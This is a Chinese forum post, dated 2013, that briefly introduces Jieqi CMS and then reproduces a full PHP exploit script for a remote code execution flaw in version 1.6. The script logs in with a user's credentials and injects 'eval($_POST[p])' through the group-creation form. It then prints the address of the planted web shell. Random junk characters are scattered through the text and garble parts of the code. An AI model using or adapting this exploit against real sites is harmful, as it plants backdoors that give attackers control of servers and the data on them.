杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
9 E9 w, C, \& J8 Q/ o. W) C3 J ~$ Q( G u9 W3 w4 z$ n- o3 r
+ p6 {* ^/ ^1 n7 s. t该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。+ k# s$ [: S# \$ @8 K5 ~* u
需要有一个能创建圈子的用户。
. `( p" y. S! h ?! g
8 e2 q2 p2 o! n2 r, W<?php& M; k8 r+ M. x
^( U0 X' ` s* G' oprint_r('
5 k. |1 U9 T# l" p3 ^) y2 H% M# n# A6 T+---------------------------------------------------------------------------+4 m) B! {/ w; ?. l" y# |
Jieqi CMS V1.6 PHP Code Injection Exploit
2 f" e4 K/ b2 Q6 ]9 b3 q8 H) `8 Oby flyh4t
8 L, ^! T4 v- Z3 Q/ H8 Lmail: phpsec at hotmail dot com
# h, f1 m" e x& q. {team: http://www.wolvez.org/ v3 @: V- }5 K& I* |. _# [: T$ v
+---------------------------------------------------------------------------+! g$ N1 i1 \" K2 u$ p8 U2 G5 U: ?" l
'); /**
! u! M2 d, a! C4 q7 w' _% e' z * works regardless of php.ini settings
2 u# O3 M$ Z. M' [*/ if ($argc < 5) { print_r('
1 L. q/ i3 v8 i! R$ `1 O$ @+---------------------------------------------------------------------------+, Q" K! |- G! B# E5 b
Usage: php '.$argv[0].' host path username7 P# P. K( y: V: {9 P
host: target server (ip/hostname)+ o& A( A! V1 B+ C# z
path: path to jieqicms
$ Q5 i. b' z* }; A( g2 ?+ }$ T$ cuasename: a username who can create group; Y% ^ w7 [, g
Example:
6 o5 E: o& V, A/ D: z4 B6 V G8 Gphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password+ }4 S! M: f c9 C1 v
+---------------------------------------------------------------------------+
* P- |2 g: H' j ?5 F4 B+ O' ~, K+ v'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
& q6 D0 I# H' z; k. [Content-Disposition: form-data; name="gname") Q K' l+ V$ x8 d. E: D
% m) S) ?- m& X( L* T" W- N9 t
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
0 V( @+ u* R5 T1 a; `1 ]-----------------------------23281168279961
: @7 T9 k9 e; `" {) s% qContent-Disposition: form-data; name="gcatid"
6 j4 e8 @- v8 O$ Y( s' e
6 B5 e5 ]# | x9 s1* M0 O4 s8 Y9 g8 j5 F0 I& M" `
-----------------------------23281168279961" f9 J8 v/ B6 Y
Content-Disposition: form-data; name="gaudit"
# W, a8 P& J$ o" O3 R
J' n# N4 J% [: ]1' O1 H. G2 s$ U. a! u6 W/ K# |
-----------------------------232811682799613 T/ R0 U; R, [" x1 P7 l8 g
Content-Disposition: form-data; name="gbrief"- K* B& z+ }+ G4 l
2 O! F. p% V" b$ A
1
1 Y: t& R' q! ]. d-----------------------------23281168279961--1 k% v1 L* A/ v! C+ D
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
- T) @2 ^% ] W) C3 c 5 l2 K" E* V0 Q" _( u( Z
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对